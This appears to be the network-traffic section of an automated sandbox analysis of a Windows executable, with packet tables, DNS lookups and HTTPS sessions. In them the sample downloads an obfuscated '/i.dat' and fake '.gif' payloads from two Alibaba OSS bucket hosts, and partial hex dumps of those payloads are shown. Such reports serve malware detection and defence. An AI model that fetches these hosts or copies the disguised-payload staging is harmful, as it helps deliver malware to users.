                                    Jan 13, 2025 13:47:46.483143091 CET4434995259.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:46.685942888 CET50007443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:46.686007023 CET4435000759.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:46.686116934 CET50007443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:46.686383009 CET50007443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:46.686403990 CET4435000759.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:47.989226103 CET4435000759.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:47.989340067 CET50007443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:47.989886045 CET50007443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:47.989906073 CET4435000759.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:47.990124941 CET50007443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:47.990133047 CET4435000759.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:48.360130072 CET4435000759.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:48.360157967 CET4435000759.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:48.360199928 CET4435000759.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:48.360279083 CET50007443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:48.360306025 CET4435000759.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:48.360332966 CET50007443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:48.360352993 CET50007443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:48.362071037 CET4435000759.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:48.362131119 CET50007443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:48.366527081 CET4435000759.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:48.366595984 CET50007443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:48.446665049 CET4435000759.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:48.446743011 CET50007443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:48.446763992 CET4435000759.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:48.446774960 CET4435000759.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:48.446814060 CET50007443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:48.447341919 CET4435000759.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:48.447393894 CET50007443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:48.447405100 CET4435000759.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:48.447439909 CET4435000759.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:48.447439909 CET50007443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:48.447477102 CET50007443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:48.447598934 CET50007443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:48.447614908 CET4435000759.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:48.463289022 CET50008443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:48.463340044 CET4435000859.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:48.463437080 CET50008443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:48.463665962 CET50008443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:48.463676929 CET4435000859.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:49.787966013 CET4435000859.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:49.788034916 CET50008443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:49.788577080 CET50008443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:49.788588047 CET4435000859.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:49.788762093 CET50008443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:49.788765907 CET4435000859.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:50.152590036 CET4435000859.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:50.152650118 CET4435000859.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:50.152767897 CET50008443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:50.152806997 CET4435000859.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:50.152854919 CET50008443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:50.152987003 CET4435000859.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:50.153039932 CET50008443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:50.153084040 CET4435000859.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:50.153129101 CET50008443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:50.153134108 CET4435000859.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:50.153171062 CET50008443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:50.153232098 CET4435000859.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:50.153286934 CET50008443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:50.153747082 CET50008443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:50.153763056 CET4435000859.110.190.21192.168.2.4
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 13, 2025 13:47:29.712419987 CET4977853192.168.2.41.1.1.1
                                    Jan 13, 2025 13:47:29.766895056 CET53497781.1.1.1192.168.2.4
                                    Jan 13, 2025 13:48:12.892642021 CET5230453192.168.2.41.1.1.1
                                    Jan 13, 2025 13:48:13.504266977 CET53523041.1.1.1192.168.2.4
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jan 13, 2025 13:47:29.712419987 CET192.168.2.41.1.1.10x8decStandard query (0)khec3y.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false
                                    Jan 13, 2025 13:48:12.892642021 CET192.168.2.41.1.1.10x7514Standard query (0)22mm.oss-cn-hangzhou.aliyuncs.comA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jan 13, 2025 13:47:29.766895056 CET1.1.1.1192.168.2.40x8decNo error (0)khec3y.oss-cn-beijing.aliyuncs.com59.110.190.21A (IP address)IN (0x0001)false
                                    Jan 13, 2025 13:48:13.504266977 CET1.1.1.1192.168.2.40x7514No error (0)22mm.oss-cn-hangzhou.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                    Jan 13, 2025 13:48:13.504266977 CET1.1.1.1192.168.2.40x7514No error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                    Jan 13, 2025 13:48:13.504266977 CET1.1.1.1192.168.2.40x7514No error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com118.178.60.9A (IP address)IN (0x0001)false
                                    • khec3y.oss-cn-beijing.aliyuncs.com
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.44990259.110.190.214436452C:\Users\user\Desktop\149876985-734579485.05.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-13 12:47:31 UTC106OUTGET /i.dat HTTP/1.1
                                    User-Agent: 3M
                                    Host: khec3y.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-13 12:47:31 UTC558INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Mon, 13 Jan 2025 12:47:31 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 512
                                    Connection: close
                                    x-oss-request-id: 67850B635423BA3634D1DB9B
                                    Accept-Ranges: bytes
                                    ETag: "0C3C81CC59CB35FD96753C541097C3E8"
                                    Last-Modified: Mon, 13 Jan 2025 11:35:41 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 3631752626051349015
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000113
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: DDyBzFnLNf2WdTxUEJfD6A==
                                    x-oss-server-time: 16
                                    2025-01-13 12:47:31 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 5b 58 55 53 60 2a 7d 3c 4f 4f 11 5f 31 72 3d 3a 53 50 53 54 33 7a 35 38 51 41 4d 56 35 25 78 35 5a 58 1a 54 7a 33 3d 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 5a 46 46 42 31 78 6d 6d 06 05 08 0e 3d 77 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 58 5b 56 50 63 29 7e 3f 4c 4c 12 5c 32 71 3e 39 50 53 50 57 30 79 36 3b 52 42 4e 55 36 26 7b 36 59 5b 19 55 7b 32 3c 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 5b 47 47 43 30 79 6c 6c 07 04 09 0f 3c 76 21
                                    Data Ascii: l%00[XUS`*}<OO_1r=:SPST3z58QAMV5%x5ZXTz3=222222222222222222222222222222222ZFFB1xmm=w aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33X[VPc)~?LL\2q>9PSPW0y6;RBNU6&{6Y[U{2<333333333333333333333333333333333[GGC0yll<v!


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.44991659.110.190.214436452C:\Users\user\Desktop\149876985-734579485.05.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-13 12:47:33 UTC106OUTGET /a.gif HTTP/1.1
                                    User-Agent: 3M
                                    Host: khec3y.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-13 12:47:33 UTC545INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Mon, 13 Jan 2025 12:47:33 GMT
                                    Content-Type: image/gif
                                    Content-Length: 135589
                                    Connection: close
                                    x-oss-request-id: 67850B65DCC23B3535512E8A
                                    Accept-Ranges: bytes
                                    ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                    Last-Modified: Mon, 13 Jan 2025 11:34:41 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 8642451798640735006
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000104
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                    x-oss-server-time: 2
                                    2025-01-13 12:47:33 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                    2025-01-13 12:47:33 UTC4096INData Raw: 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c 87
                                    Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                                    2025-01-13 12:47:33 UTC4096INData Raw: 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 92
                                    Data Ascii: Il]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                                    2025-01-13 12:47:33 UTC4096INData Raw: 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 ea
                                    Data Ascii: c}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                                    2025-01-13 12:47:34 UTC4096INData Raw: ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 55
                                    Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`U
                                    2025-01-13 12:47:34 UTC4096INData Raw: d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 92
                                    Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                                    2025-01-13 12:47:34 UTC4096INData Raw: d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 17
                                    Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                                    2025-01-13 12:47:34 UTC4096INData Raw: 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a 58
                                    Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_X
                                    2025-01-13 12:47:34 UTC4096INData Raw: 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 52
                                    Data Ascii: Z~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJLR
                                    2025-01-13 12:47:34 UTC4096INData Raw: 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd 19
                                    Data Ascii: WUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.44993059.110.190.214436452C:\Users\user\Desktop\149876985-734579485.05.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-13 12:47:35 UTC106OUTGET /b.gif HTTP/1.1
                                    User-Agent: 3M
                                    Host: khec3y.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-13 12:47:36 UTC546INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Mon, 13 Jan 2025 12:47:36 GMT
                                    Content-Type: image/gif
                                    Content-Length: 125333
                                    Connection: close
                                    x-oss-request-id: 67850B68F06ABA3631C75C04
                                    Accept-Ranges: bytes
                                    ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                    Last-Modified: Mon, 13 Jan 2025 11:34:41 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 10333201072197591521
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000104
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                    x-oss-server-time: 2
                                    2025-01-13 12:47:36 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
